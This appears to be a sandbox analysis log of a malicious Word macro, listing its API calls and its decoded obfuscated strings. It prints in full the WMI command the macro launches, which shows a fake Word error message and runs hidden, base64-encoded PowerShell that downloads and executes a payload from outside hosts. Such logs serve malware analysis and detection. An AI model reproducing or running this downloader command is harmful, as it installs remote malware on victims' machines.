]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689
lBenBDA
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
UavHTIBHo
Close
IcAHwPH
BNmrm
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
FLtYjKHC
Close
qAUhkIMz
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
V2enhc4htwl7z6bh
Thriap3q9rgf3yy9y
zZuzBZGD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
OIbfvEEFF
Close
eLmLDU
FYVZFEH
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hoyzuBGCP
Close
lADFBaJ

Strings	Decrypted Strings
"Jsnt2t9fi0a8nnsiaf""Bete9x47doew46v"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC"
"VrVKCjefsIJ"
"sxbwAfRtWJI"
"WLXLJnjItPGPZJ"
"]anw[3""p]anw[3"
"]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF"
"ImJJdfAtdFHCh"
"deVdMyoREdgzCaJb"
"XZzpBRpDKuMgsGHIHF"
"]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf"
"uTtCAFwHpCGF"
"lwWhZGEasjsS"
"MiCjaGqJfPrI"
"w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"HQGixyC:\vETCeBG\zIuEqsGG.NobmDA"
"dXFPCSYtSNB"
"KqVyuQQfwTWh"
"qDaYIDDSZQMTaO"
"]anw[3""]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ"
"MxCpGaGqBgemCAFEJ"
"hbtzFRJEXyDCXI"
"zdTcdOoXXUFHJK"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo"
